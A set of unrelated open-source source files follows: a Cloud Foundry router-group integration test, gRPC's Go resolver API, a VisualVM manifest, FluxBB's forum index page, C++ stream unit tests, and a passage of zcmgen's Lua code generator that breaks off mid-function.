* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.cloudfoundry.routing.v1;
import org.cloudfoundry.AbstractIntegrationTest;
import org.cloudfoundry.routing.RoutingClient;
import org.cloudfoundry.routing.v1.routergroups.ListRouterGroupsRequest;
import org.cloudfoundry.routing.v1.routergroups.ListRouterGroupsResponse;
import org.cloudfoundry.routing.v1.routergroups.RouterGroup;
import org.cloudfoundry.routing.v1.routergroups.UpdateRouterGroupRequest;
import org.cloudfoundry.routing.v1.routergroups.UpdateRouterGroupResponse;
import org.junit.Test;
import org.springframework.beans.factory.annotation.Autowired;
import reactor.core.publisher.Mono;
import reactor.test.StepVerifier;
import java.time.Duration;
import java.util.concurrent.TimeoutException;
public final class RouterGroupsTest extends AbstractIntegrationTest {
private static final String DEFAULT_ROUTER_GROUP = "default-tcp";
@Autowired
private RoutingClient routingClient;
@Test
public void list() {
this.routingClient.routerGroups()
.list(ListRouterGroupsRequest.builder()
.build())
.flatMapIterable(ListRouterGroupsResponse::getRouterGroups)
.map(RouterGroup::getName)
.filter(DEFAULT_ROUTER_GROUP::equals)
.as(StepVerifier::create)
.expectNext(DEFAULT_ROUTER_GROUP)
.expectComplete()
.verify(Duration.ofMinutes(5));
}
@Test
public void update() {
getRouterGroupId(this.routingClient, DEFAULT_ROUTER_GROUP)
.flatMap(routerGroupId -> this.routingClient.routerGroups()
.update(UpdateRouterGroupRequest.builder()
.reservablePorts("61001-61099")
.routerGroupId(routerGroupId)
.build()))
.map(UpdateRouterGroupResponse::getReservablePorts)
.as(StepVerifier::create)
.expectNext("61001-61099")
.expectComplete()
.verify(Duration.ofMinutes(5));
}
private static Mono<String> getRouterGroupId(RoutingClient routingClient, String routerGroupName) {
return requestListRouterGroups(routingClient)
.flatMapIterable(ListRouterGroupsResponse::getRouterGroups)
.filter(group -> routerGroupName.equals(group.getName()))
.single()
.map(RouterGroup::getRouterGroupId);
}
private static Mono<ListRouterGroupsResponse> requestListRouterGroups(RoutingClient routingClient) {
return routingClient.routerGroups()
.list(ListRouterGroupsRequest.builder()
.build());
}
}
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2017 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
// Package resolver defines APIs for name resolution in gRPC.
// All APIs in this package are experimental.
package resolver
import (
"google.golang.org/grpc/serviceconfig"
)
var (
// m is a map from scheme to resolver builder.
m = make(map[string]Builder)
// defaultScheme is the default scheme to use.
defaultScheme = "passthrough"
)
// TODO(bar) install dns resolver in init(){}.
// Register registers the resolver builder to the resolver map. b.Scheme will be
// used as the scheme registered with this builder.
//
// NOTE: this function must only be called during initialization time (i.e. in
// an init() function), and is not thread-safe. If multiple Resolvers are
// registered with the same name, the one registered last will take effect.
func Register(b Builder) {
m[b.Scheme()] = b
}
// Get returns the resolver builder registered with the given scheme.
//
// If no builder is register with the scheme, nil will be returned.
func Get(scheme string) Builder {
if b, ok := m[scheme]; ok {
return b
}
return nil
}
// SetDefaultScheme sets the default scheme that will be used. The default
// default scheme is "passthrough".
//
// NOTE: this function must only be called during initialization time (i.e. in
// an init() function), and is not thread-safe. The scheme set last overrides
// previously set values.
func SetDefaultScheme(scheme string) {
defaultScheme = scheme
}
// GetDefaultScheme gets the default scheme that will be used.
func GetDefaultScheme() string {
return defaultScheme
}
// AddressType indicates the address type returned by name resolution.
type AddressType uint8
const (
// Backend indicates the address is for a backend server.
Backend AddressType = iota
// GRPCLB indicates the address is for a grpclb load balancer.
GRPCLB
)
// Address represents a server the client connects to.
// This is the EXPERIMENTAL API and may be changed or extended in the future.
type Address struct {
// Addr is the server address on which a connection will be established.
Addr string
// Type is the type of this address.
Type AddressType
// ServerName is the name of this address.
//
// e.g. if Type is GRPCLB, ServerName should be the name of the remote load
// balancer, not the name of the backend.
ServerName string
// Metadata is the information associated with Addr, which may be used
// to make load balancing decision.
Metadata interface{}
}
// BuildOption includes additional information for the builder to create
// the resolver.
type BuildOption struct {
// DisableServiceConfig indicates whether resolver should fetch service config data.
DisableServiceConfig bool
}
// State contains the current Resolver state relevant to the ClientConn.
type State struct {
Addresses []Address // Resolved addresses for the target
// ServiceConfig is the parsed service config; obtained from
// serviceconfig.Parse.
ServiceConfig serviceconfig.Config
// TODO: add Err error
}
// ClientConn contains the callbacks for resolver to notify any updates
// to the gRPC ClientConn.
//
// This interface is to be implemented by gRPC. Users should not need a
// brand new implementation of this interface. For the situations like
// testing, the new implementation should embed this interface. This allows
// gRPC to add new methods to this interface.
type ClientConn interface {
// UpdateState updates the state of the ClientConn appropriately.
UpdateState(State)
// NewAddress is called by resolver to notify ClientConn a new list
// of resolved addresses.
// The address list should be the complete list of resolved addresses.
//
// Deprecated: Use UpdateState instead.
NewAddress(addresses []Address)
// NewServiceConfig is called by resolver to notify ClientConn a new
// service config. The service config should be provided as a json string.
//
// Deprecated: Use UpdateState instead.
NewServiceConfig(serviceConfig string)
}
// Target represents a target for gRPC, as specified in:
// https://github.com/grpc/grpc/blob/master/doc/naming.md.
// It is parsed from the target string that gets passed into Dial or DialContext by the user. And
// grpc passes it to the resolver and the balancer.
//
// If the target follows the naming spec, and the parsed scheme is registered with grpc, we will
// parse the target string according to the spec. e.g. "dns://some_authority/foo.bar" will be parsed
// into &Target{Scheme: "dns", Authority: "some_authority", Endpoint: "foo.bar"}
//
// If the target does not contain a scheme, we will apply the default scheme, and set the Target to
// be the full target string. e.g. "foo.bar" will be parsed into
// &Target{Scheme: resolver.GetDefaultScheme(), Endpoint: "foo.bar"}.
//
// If the parsed scheme is not registered (i.e. no corresponding resolver available to resolve the
// endpoint), we set the Scheme to be the default scheme, and set the Endpoint to be the full target
// string. e.g. target string "unknown_scheme://authority/endpoint" will be parsed into
// &Target{Scheme: resolver.GetDefaultScheme(), Endpoint: "unknown_scheme://authority/endpoint"}.
type Target struct {
Scheme string
Authority string
Endpoint string
}
// Builder creates a resolver that will be used to watch name resolution updates.
type Builder interface {
// Build creates a new resolver for the given target.
//
// gRPC dial calls Build synchronously, and fails if the returned error is
// not nil.
Build(target Target, cc ClientConn, opts BuildOption) (Resolver, error)
// Scheme returns the scheme supported by this resolver.
// Scheme is defined at https://github.com/grpc/grpc/blob/master/doc/naming.md.
Scheme() string
}
// ResolveNowOption includes additional information for ResolveNow.
type ResolveNowOption struct{}
// Resolver watches for the updates on the specified target.
// Updates include address updates and service config updates.
type Resolver interface {
// ResolveNow will be called by gRPC to try to resolve the target name
// again. It's just a hint, resolver can ignore this if it's not necessary.
//
// It could be called multiple times concurrently.
ResolveNow(ResolveNowOption)
// Close closes the resolver.
Close()
}
// UnregisterForTesting removes the resolver builder with the given scheme from the
// resolver map.
// This function is for testing only.
func UnregisterForTesting(scheme string) {
delete(m, scheme)
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?><module codename="com.sun.tools.visualvm.coredump/0">
<module_version install_time="1410360604235" last="true" origin="installer" specification_version="1.0">
<file crc="245075297" name="config/Modules/com-sun-tools-visualvm-coredump.xml"/>
<file crc="3679815556" name="modules/com-sun-tools-visualvm-coredump.jar"/>
</module_version>
</module>
| {
"pile_set_name": "Github"
} |
<?php
/**
* Copyright (C) 2008-2012 FluxBB
* based on code by Rickard Andersson copyright (C) 2002-2008 PunBB
* License: http://www.gnu.org/licenses/gpl.html GPL version 2 or higher
*/
define('PUN_ROOT', dirname(__FILE__).'/');
require PUN_ROOT.'include/common.php';
if ($pun_user['g_read_board'] == '0')
message($lang_common['No view'], false, '403 Forbidden');
// Load the index.php language file
require PUN_ROOT.'lang/'.$pun_user['language'].'/index.php';
// Get list of forums and topics with new posts since last visit
if (!$pun_user['is_guest'])
{
$result = $db->query('SELECT f.id, f.last_post FROM '.$db->prefix.'forums AS f LEFT JOIN '.$db->prefix.'forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id='.$pun_user['g_id'].') WHERE (fp.read_forum IS NULL OR fp.read_forum=1) AND f.last_post>'.$pun_user['last_visit']) or error('Unable to fetch forum list', __FILE__, __LINE__, $db->error());
if ($db->has_rows($result))
{
$forums = $new_topics = array();
$tracked_topics = get_tracked_topics();
while ($cur_forum = $db->fetch_assoc($result))
{
if (!isset($tracked_topics['forums'][$cur_forum['id']]) || $tracked_topics['forums'][$cur_forum['id']] < $cur_forum['last_post'])
$forums[$cur_forum['id']] = $cur_forum['last_post'];
}
if (!empty($forums))
{
if (empty($tracked_topics['topics']))
$new_topics = $forums;
else
{
$result = $db->query('SELECT forum_id, id, last_post FROM '.$db->prefix.'topics WHERE forum_id IN('.implode(',', array_keys($forums)).') AND last_post>'.$pun_user['last_visit'].' AND moved_to IS NULL') or error('Unable to fetch new topics', __FILE__, __LINE__, $db->error());
while ($cur_topic = $db->fetch_assoc($result))
{
if (!isset($new_topics[$cur_topic['forum_id']]) && (!isset($tracked_topics['forums'][$cur_topic['forum_id']]) || $tracked_topics['forums'][$cur_topic['forum_id']] < $forums[$cur_topic['forum_id']]) && (!isset($tracked_topics['topics'][$cur_topic['id']]) || $tracked_topics['topics'][$cur_topic['id']] < $cur_topic['last_post']))
$new_topics[$cur_topic['forum_id']] = $forums[$cur_topic['forum_id']];
}
}
}
}
}
if ($pun_config['o_feed_type'] == '1')
$page_head = array('feed' => '<link rel="alternate" type="application/rss+xml" href="extern.php?action=feed&type=rss" title="'.$lang_common['RSS active topics feed'].'" />');
else if ($pun_config['o_feed_type'] == '2')
$page_head = array('feed' => '<link rel="alternate" type="application/atom+xml" href="extern.php?action=feed&type=atom" title="'.$lang_common['Atom active topics feed'].'" />');
$forum_actions = array();
// Display a "mark all as read" link
if (!$pun_user['is_guest'])
$forum_actions[] = '<a href="misc.php?action=markread&csrf_token='.pun_csrf_token().'">'.$lang_common['Mark all as read'].'</a>';
$page_title = array(pun_htmlspecialchars($pun_config['o_board_title']));
define('PUN_ALLOW_INDEX', 1);
define('PUN_ACTIVE_PAGE', 'index');
require PUN_ROOT.'header.php';
// Print the categories and forums
$result = $db->query('SELECT c.id AS cid, c.cat_name, f.id AS fid, f.forum_name, f.forum_desc, f.redirect_url, f.moderators, f.num_topics, f.num_posts, f.last_post, f.last_post_id, f.last_poster FROM '.$db->prefix.'categories AS c INNER JOIN '.$db->prefix.'forums AS f ON c.id=f.cat_id LEFT JOIN '.$db->prefix.'forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id='.$pun_user['g_id'].') WHERE fp.read_forum IS NULL OR fp.read_forum=1 ORDER BY c.disp_position, c.id, f.disp_position', true) or error('Unable to fetch category/forum list', __FILE__, __LINE__, $db->error());
$cur_category = 0;
$cat_count = 0;
$forum_count = 0;
while ($cur_forum = $db->fetch_assoc($result))
{
$moderators = '';
if ($cur_forum['cid'] != $cur_category) // A new category since last iteration?
{
if ($cur_category != 0)
echo "\t\t\t".'</tbody>'."\n\t\t\t".'</table>'."\n\t\t".'</div>'."\n\t".'</div>'."\n".'</div>'."\n\n";
++$cat_count;
$forum_count = 0;
?>
<div id="idx<?php echo $cat_count ?>" class="blocktable">
<h2><span><?php echo pun_htmlspecialchars($cur_forum['cat_name']) ?></span></h2>
<div class="box">
<div class="inbox">
<table>
<thead>
<tr>
<th class="tcl" scope="col"><?php echo $lang_common['Forum'] ?></th>
<th class="tc2" scope="col"><?php echo $lang_index['Topics'] ?></th>
<th class="tc3" scope="col"><?php echo $lang_common['Posts'] ?></th>
<th class="tcr" scope="col"><?php echo $lang_common['Last post'] ?></th>
</tr>
</thead>
<tbody>
<?php
$cur_category = $cur_forum['cid'];
}
++$forum_count;
$item_status = ($forum_count % 2 == 0) ? 'roweven' : 'rowodd';
$forum_field_new = '';
$icon_type = 'icon';
// Are there new posts since our last visit?
if (isset($new_topics[$cur_forum['fid']]))
{
$item_status .= ' inew';
$forum_field_new = '<span class="newtext">[ <a href="search.php?action=show_new&fid='.$cur_forum['fid'].'">'.$lang_common['New posts'].'</a> ]</span>';
$icon_type = 'icon icon-new';
}
// Is this a redirect forum?
if ($cur_forum['redirect_url'] != '')
{
$forum_field = '<h3><span class="redirtext">'.$lang_index['Link to'].'</span> <a href="'.pun_htmlspecialchars($cur_forum['redirect_url']).'" title="'.$lang_index['Link to'].' '.pun_htmlspecialchars($cur_forum['redirect_url']).'">'.pun_htmlspecialchars($cur_forum['forum_name']).'</a></h3>';
$num_topics = $num_posts = '-';
$item_status .= ' iredirect';
$icon_type = 'icon';
}
else
{
$forum_field = '<h3><a href="viewforum.php?id='.$cur_forum['fid'].'">'.pun_htmlspecialchars($cur_forum['forum_name']).'</a>'.(!empty($forum_field_new) ? ' '.$forum_field_new : '').'</h3>';
$num_topics = $cur_forum['num_topics'];
$num_posts = $cur_forum['num_posts'];
}
if ($cur_forum['forum_desc'] != '')
$forum_field .= "\n\t\t\t\t\t\t\t\t".'<div class="forumdesc">'.$cur_forum['forum_desc'].'</div>';
// If there is a last_post/last_poster
if ($cur_forum['last_post'] != '')
$last_post = '<a href="viewtopic.php?pid='.$cur_forum['last_post_id'].'#p'.$cur_forum['last_post_id'].'">'.format_time($cur_forum['last_post']).'</a> <span class="byuser">'.$lang_common['by'].' '.pun_htmlspecialchars($cur_forum['last_poster']).'</span>';
else if ($cur_forum['redirect_url'] != '')
$last_post = '- - -';
else
$last_post = $lang_common['Never'];
if ($cur_forum['moderators'] != '')
{
$mods_array = unserialize($cur_forum['moderators']);
$moderators = array();
foreach ($mods_array as $mod_username => $mod_id)
{
if ($pun_user['g_view_users'] == '1')
$moderators[] = '<a href="profile.php?id='.$mod_id.'">'.pun_htmlspecialchars($mod_username).'</a>';
else
$moderators[] = pun_htmlspecialchars($mod_username);
}
$moderators = "\t\t\t\t\t\t\t\t".'<p class="modlist">(<em>'.$lang_common['Moderated by'].'</em> '.implode(', ', $moderators).')</p>'."\n";
}
?>
<tr class="<?php echo $item_status ?>">
<td class="tcl">
<div class="<?php echo $icon_type ?>"><div class="nosize"><?php echo forum_number_format($forum_count) ?></div></div>
<div class="tclcon">
<div>
<?php echo $forum_field."\n".$moderators ?>
</div>
</div>
</td>
<td class="tc2"><?php echo forum_number_format($num_topics) ?></td>
<td class="tc3"><?php echo forum_number_format($num_posts) ?></td>
<td class="tcr"><?php echo $last_post ?></td>
</tr>
<?php
}
// Did we output any categories and forums?
if ($cur_category > 0)
echo "\t\t\t".'</tbody>'."\n\t\t\t".'</table>'."\n\t\t".'</div>'."\n\t".'</div>'."\n".'</div>'."\n\n";
else
echo '<div id="idx0" class="block"><div class="box"><div class="inbox"><p>'.$lang_index['Empty board'].'</p></div></div></div>';
// Collect some statistics from the database
if (file_exists(FORUM_CACHE_DIR.'cache_users_info.php'))
include FORUM_CACHE_DIR.'cache_users_info.php';
if (!defined('PUN_USERS_INFO_LOADED'))
{
if (!defined('FORUM_CACHE_FUNCTIONS_LOADED'))
require PUN_ROOT.'include/cache.php';
generate_users_info_cache();
require FORUM_CACHE_DIR.'cache_users_info.php';
}
$result = $db->query('SELECT SUM(num_topics), SUM(num_posts) FROM '.$db->prefix.'forums') or error('Unable to fetch topic/post count', __FILE__, __LINE__, $db->error());
list($stats['total_topics'], $stats['total_posts']) = array_map('intval', $db->fetch_row($result));
if ($pun_user['g_view_users'] == '1')
$stats['newest_user'] = '<a href="profile.php?id='.$stats['last_user']['id'].'">'.pun_htmlspecialchars($stats['last_user']['username']).'</a>';
else
$stats['newest_user'] = pun_htmlspecialchars($stats['last_user']['username']);
if (!empty($forum_actions))
{
?>
<div class="linksb">
<div class="inbox crumbsplus">
<p class="subscribelink clearb"><?php echo implode(' - ', $forum_actions); ?></p>
</div>
</div>
<?php
}
?>
<div id="brdstats" class="block">
<h2><span><?php echo $lang_index['Board info'] ?></span></h2>
<div class="box">
<div class="inbox">
<dl class="conr">
<dt><strong><?php echo $lang_index['Board stats'] ?></strong></dt>
<dd><span><?php printf($lang_index['No of users'], '<strong>'.forum_number_format($stats['total_users']).'</strong>') ?></span></dd>
<dd><span><?php printf($lang_index['No of topics'], '<strong>'.forum_number_format($stats['total_topics']).'</strong>') ?></span></dd>
<dd><span><?php printf($lang_index['No of posts'], '<strong>'.forum_number_format($stats['total_posts']).'</strong>') ?></span></dd>
</dl>
<dl class="conl">
<dt><strong><?php echo $lang_index['User info'] ?></strong></dt>
<dd><span><?php printf($lang_index['Newest user'], $stats['newest_user']) ?></span></dd>
<?php
if ($pun_config['o_users_online'] == '1')
{
// Fetch users online info and generate strings for output
$num_guests = 0;
$users = array();
$result = $db->query('SELECT user_id, ident FROM '.$db->prefix.'online WHERE idle=0 ORDER BY ident', true) or error('Unable to fetch online list', __FILE__, __LINE__, $db->error());
while ($pun_user_online = $db->fetch_assoc($result))
{
if ($pun_user_online['user_id'] > 1)
{
if ($pun_user['g_view_users'] == '1')
$users[] = "\n\t\t\t\t".'<dd><a href="profile.php?id='.$pun_user_online['user_id'].'">'.pun_htmlspecialchars($pun_user_online['ident']).'</a>';
else
$users[] = "\n\t\t\t\t".'<dd>'.pun_htmlspecialchars($pun_user_online['ident']);
}
else
++$num_guests;
}
$num_users = count($users);
echo "\t\t\t\t".'<dd><span>'.sprintf($lang_index['Users online'], '<strong>'.forum_number_format($num_users).'</strong>').'</span></dd>'."\n\t\t\t\t".'<dd><span>'.sprintf($lang_index['Guests online'], '<strong>'.forum_number_format($num_guests).'</strong>').'</span></dd>'."\n\t\t\t".'</dl>'."\n";
if ($num_users > 0)
echo "\t\t\t".'<dl id="onlinelist" class="clearb">'."\n\t\t\t\t".'<dt><strong>'.$lang_index['Online'].' </strong></dt>'."\t\t\t\t".implode(',</dd> ', $users).'</dd>'."\n\t\t\t".'</dl>'."\n";
else
echo "\t\t\t".'<div class="clearer"></div>'."\n";
}
else
echo "\t\t\t".'</dl>'."\n\t\t\t".'<div class="clearer"></div>'."\n";
?>
</div>
</div>
</div>
<?php
$footer_style = 'index';
require PUN_ROOT.'footer.php';
| {
"pile_set_name": "Github"
} |
trait T[X] {}
fn f[A, B: T[A]](b: B) -> () {}
fn main[C: T[bool]](c: C) -> () {
f(c)
}
| {
"pile_set_name": "Github"
} |
#include <Stream.h>
#include <gmock/gmock.h>
using namespace testing;
using namespace stream;
using namespace stream::op;
#define EXCEPTION_TEST(Operation, Exception) \
[](){ \
bool thrown = false; \
try { Operation; } catch(Exception& e) { thrown = true; } \
return thrown; \
}()
#define EXPECT_EXCEPTION(Operation, Exception) \
EXPECT_THAT(EXCEPTION_TEST(Operation, Exception), Eq(true));
TEST(FirstTest, Default) {
EXPECT_THAT(MakeStream::counter(0) | first(), Eq(0));
}
TEST(FirstTest, EmptyStream) {
EXPECT_EXCEPTION(MakeStream::empty<int>() | first(), EmptyStreamException);
}
TEST(LastTest, Default) {
EXPECT_THAT(MakeStream::range(0, 10) | last(), Eq(9));
}
TEST(LastTest, EmptyStream) {
EXPECT_EXCEPTION(MakeStream::empty<int>() | last(), EmptyStreamException);
}
TEST(NthTest, Default) {
EXPECT_THAT(MakeStream::counter(0) | nth(5), Eq(5));
}
TEST(NthTest, EmptyStream) {
EXPECT_EXCEPTION(MakeStream::range(0, 3) | nth(5), EmptyStreamException);
EXPECT_EXCEPTION(MakeStream::empty<int>() | nth(5), EmptyStreamException);
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-16"?>
<StatusWindowText xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
</StatusWindowText> | {
"pile_set_name": "Github"
} |
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <sys/stat.h>
#include <sys/types.h>
#ifdef WIN32
#define __STDC_FORMAT_MACROS
#include <inttypes.h>
#include <zcm/windows/WinPorting.h>
#include <windows.h>
#else
#include <inttypes.h>
#include <unistd.h>
#include <fcntl.h>
#endif
#include <glib.h>
#include "zcmgen.h"
// lua uses just 2 spaces per indent
#define INDENT(n) (2*(n))
#define emit_start(n, ...) do { fprintf(f, "%*s", INDENT(n), ""); fprintf(f, __VA_ARGS__); } while (0)
#define emit_continue(...) do { fprintf(f, __VA_ARGS__); } while (0)
#define emit_end(...) do { fprintf(f, __VA_ARGS__); fprintf(f, "\n"); } while (0)
#define emit(n, ...) do { fprintf(f, "%*s", INDENT(n), ""); fprintf(f, __VA_ARGS__); fprintf(f, "\n"); } while (0)
#define err(...) fprintf (stderr, __VA_ARGS__)
static void
mkdir_with_parents (const char *path, mode_t mode)
{
#ifdef WIN32
g_mkdir_with_parents(path, 0755);
#else
int len = strlen(path);
for (int i = 0; i < len; i++) {
if (path[i]=='/') {
char *dirpath = (char *) malloc(i+1);
strncpy(dirpath, path, i);
dirpath[i]=0;
mkdir(dirpath, mode);
free(dirpath);
i++; // skip the '/'
}
}
#endif
}
static char *
build_filenamev (char **parts)
{
char **p = parts;
int total_len = 0;
for (p = parts; *p; p++) {
total_len += strlen (*p) + strlen(G_DIR_SEPARATOR_S);
}
total_len ++;
char *result = (char *) malloc(total_len);
memset(result, 0, total_len);
for (p = parts; *p; p++) {
if (! strlen(*p)) continue;
strncat(result, *p, total_len);
if (*(p+1))
strncat(result, G_DIR_SEPARATOR_S, total_len);
}
return result;
}
static void
get_all_vals_helper (gpointer key, gpointer value, gpointer user_data)
{
GPtrArray *vals = (GPtrArray*) user_data;
g_ptr_array_add(vals, value);
}
static GPtrArray *
_hash_table_get_vals (GHashTable *hash_table)
{
GPtrArray *vals = g_ptr_array_sized_new(g_hash_table_size(hash_table));
g_hash_table_foreach (hash_table, get_all_vals_helper, vals);
return vals;
}
void setup_lua_options(getopt_t *gopt)
{
getopt_add_string(gopt, 0, "lpath", "",
"Lua destination directory");
}
static int
is_same_type (const zcm_typename_t *tn1, const zcm_typename_t *tn2) {
return ! strcmp (tn1->lctypename, tn2->lctypename);
}
static const char *
nil_initializer_string(const zcm_typename_t *type)
{
if (!strcmp(type->lctypename, "byte")) return "0";
if (!strcmp(type->lctypename, "boolean")) return "false";
if (!strcmp(type->lctypename, "int8_t")) return "0";
if (!strcmp(type->lctypename, "int16_t")) return "0";
if (!strcmp(type->lctypename, "int32_t")) return "0";
if (!strcmp(type->lctypename, "int64_t")) return "0";
if (!strcmp(type->lctypename, "float")) return "0.0";
if (!strcmp(type->lctypename, "double")) return "0.0";
if (!strcmp(type->lctypename, "string")) return "''";
else return "nil";
}
static char
_struct_format (zcm_member_t *lm)
{
const char *tn = lm->type->lctypename;
if (!strcmp ("byte", tn)) return 'B';
if (!strcmp ("boolean", tn)) return '?';
if (!strcmp ("int8_t", tn)) return 'b';
if (!strcmp ("int16_t", tn)) return 'h';
if (!strcmp ("int32_t", tn)) return 'i';
if (!strcmp ("int64_t", tn)) return 'q';
if (!strcmp ("float", tn)) return 'f';
if (!strcmp ("double", tn)) return 'd';
return 0;
}
static int
_primitive_type_size (const char *tn)
{
if (!strcmp ("byte", tn)) return 1;
if (!strcmp ("boolean", tn)) return 1;
if (!strcmp ("int8_t", tn)) return 1;
if (!strcmp ("int16_t", tn)) return 2;
if (!strcmp ("int32_t", tn)) return 4;
if (!strcmp ("int64_t", tn)) return 8;
if (!strcmp ("float", tn)) return 4;
if (!strcmp ("double", tn)) return 8;
assert (0);
return 0;
}
static char *
escape_typename_to_variablename(const char * tn){
char const * varname = g_strdup(tn);
char * nameptr = (char *) varname;
while(*nameptr != '\0'){
if(*nameptr == '.'){
*nameptr = '_';
}
++nameptr;
}
return (char *) varname;
}
static void
_emit_decode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
zcm_member_t *lm, const char *accessor, int indent)
{
// XXX probably needs some rework
const char *tn = lm->type->lctypename;
const char *mn = lm->membername;
const char *sn = lm->type->shortname;
if (!strcmp ("string", tn)) {
emit (indent, "local __%s_tmpstrlen = zcm._pack.unpack('>I', data:read(4))", mn);
emit (indent, "%s = zcm._pack.prepare_string(data:read(__%s_tmpstrlen))",
accessor, mn);
} else if (!strcmp ("byte", tn)) {
emit (indent, "%s = zcm._pack.unpack('>B', data:read(1))", accessor);
} else if (!strcmp ("int8_t", tn)) {
emit (indent, "%s = zcm._pack.unpack('>b', data:read(1))", accessor);
} else if (!strcmp ("boolean", tn)) {
emit (indent, "%s = zcm._pack.unpack('>?', data:read(1))", accessor);
} else if (!strcmp ("int16_t", tn)) {
emit (indent, "%s = zcm._pack.unpack('>h', data:read(2))", accessor);
} else if (!strcmp ("int32_t", tn)) {
emit (indent, "%s = zcm._pack.unpack('>i', data:read(4))", accessor);
} else if (!strcmp ("int64_t", tn)) {
emit (indent, "%s = zcm._pack.unpack('>q', data:read(8))", accessor);
} else if (!strcmp ("float", tn)) {
emit (indent, "%s = zcm._pack.unpack('>f', data:read(4))", accessor);
} else if (!strcmp ("double", tn)) {
emit (indent, "%s = zcm._pack.unpack('>d', data:read(8))", accessor);
} else {
// XXX not really sure about these...
// check if same type
if (is_same_type(lm->type, ls->structname)) {
emit (indent, "%s = %s._decode_one(data)", accessor, sn);
} else {
char *variablename = escape_typename_to_variablename(tn);
emit (indent, "%s = %s._decode_one(data)", accessor, variablename);
g_free(variablename);
}
}
}
static void
_emit_decode_list(const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
zcm_member_t *lm, const char *accessor, int indent,
const char *len, int fixed_len)
{
const char *tn = lm->type->lctypename;
if (!strcmp ("byte", tn) ||
!strcmp ("int8_t", tn) ||
!strcmp ("boolean", tn) ||
!strcmp ("int16_t", tn) ||
!strcmp ("int32_t", tn) ||
!strcmp ("int64_t", tn) ||
!strcmp ("float", tn) ||
!strcmp ("double", tn)) {
if(fixed_len) {
emit (indent, "%s = {zcm._pack.unpack('>%s%c', data:read(%d))}",
accessor, len, _struct_format(lm),
atoi(len) * _primitive_type_size(tn));
} else {
if(_primitive_type_size(tn) > 1) {
emit (indent, "%s = {zcm._pack.unpack(string.format('>%%d%c', obj.%s), data:read(obj.%s * %d))}",
accessor, _struct_format(lm), len, len, _primitive_type_size(tn));
} else {
emit (indent, "%s = {zcm._pack.unpack(string.format('>%%d%c', obj.%s), data:read(obj.%s))}",
accessor, _struct_format(lm), len, len);
}
}
} else {
assert(0);
}
}
static void
_flush_read_struct_fmt (const zcmgen_t *zcm, FILE *f,
GQueue *formats, GQueue *members)
{
int nfmts = g_queue_get_length(formats);
assert (nfmts == g_queue_get_length (members));
if(nfmts == 0)
return;
emit_start(1, ""); // for indent
int fmtsize = 0;
while (! g_queue_is_empty (members)) {
zcm_member_t *lm = (zcm_member_t*) g_queue_pop_head (members);
emit_continue ("obj.%s", lm->membername);
if (! g_queue_is_empty (members)) {
emit_continue (", ");
}
fmtsize += _primitive_type_size (lm->type->lctypename);
}
emit_continue (" = zcm._pack.unpack('>");
while (! g_queue_is_empty (formats)) {
emit_continue ("%c", GPOINTER_TO_INT (g_queue_pop_head (formats)));
}
emit_end ("', data:read(%d))", fmtsize);
}
static void
emit_lua_decode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
emit(0, "function %s._decode_one(data)", ls->structname->shortname);
emit(0, "");
emit(0, " if not data.read then");
emit(0, " data = _buffer_helper:new(data)");
emit(0, " end");
emit(0, "");
emit(0, " local obj = %s:new()", ls->structname->shortname);
emit(0, "");
GQueue *struct_fmt = g_queue_new ();
GQueue *struct_members = g_queue_new ();
for (unsigned int m = 0; m < g_ptr_array_size(ls->members); m++) {
zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
char fmt = _struct_format (lm);
if (! lm->dimensions->len) {
if (fmt) {
g_queue_push_tail (struct_fmt, GINT_TO_POINTER ((int)fmt));
g_queue_push_tail (struct_members, lm);
} else {
_flush_read_struct_fmt (zcm, f, struct_fmt, struct_members);
char *accessor = g_strdup_printf("obj.%s", lm->membername);
_emit_decode_one (zcm, f, ls, lm, accessor, 1);
g_free(accessor);
}
} else {
_flush_read_struct_fmt (zcm, f, struct_fmt, struct_members);
GString *accessor = g_string_new ("");
g_string_append_printf (accessor, "obj.%s", lm->membername);
// iterate through the dimensions of the member, building up
// an accessor string, and emitting for loops
int n;
for (n=0; n<lm->dimensions->len - 1; n++) {
zcm_dimension_t *dim =
(zcm_dimension_t *) g_ptr_array_index (lm->dimensions, n);
emit (1+n, "%s = {}", accessor->str);
if (dim->mode == ZCM_CONST) {
emit (1+n, "for i%d = 1, %s do", n, dim->size);
} else {
emit (1+n, "for i%d = 1, obj.%s do", n, dim->size);
}
g_string_append_printf(accessor, "[i%d]", n);
}
// last dimension.
zcm_dimension_t *last_dim = (zcm_dimension_t *) g_ptr_array_index(lm->dimensions,
lm->dimensions->len - 1);
int last_dim_fixed_len = last_dim->mode == ZCM_CONST;
if(zcm_is_primitive_type(lm->type->lctypename) &&
0 != strcmp(lm->type->lctypename, "string")) {
// member is a primitive non-string type. Emit code to
// decode a full array in one call to struct.unpack
_emit_decode_list(zcm, f, ls, lm,
accessor->str, 1+n, last_dim->size, last_dim_fixed_len);
} else {
// member is either a string type or an inner ZCM type. Each
// array element must be decoded individually
emit (1+n, "%s = {}", accessor->str);
if (last_dim_fixed_len) {
emit (1+n, "for i%d = 1, %s do", n, last_dim->size);
} else {
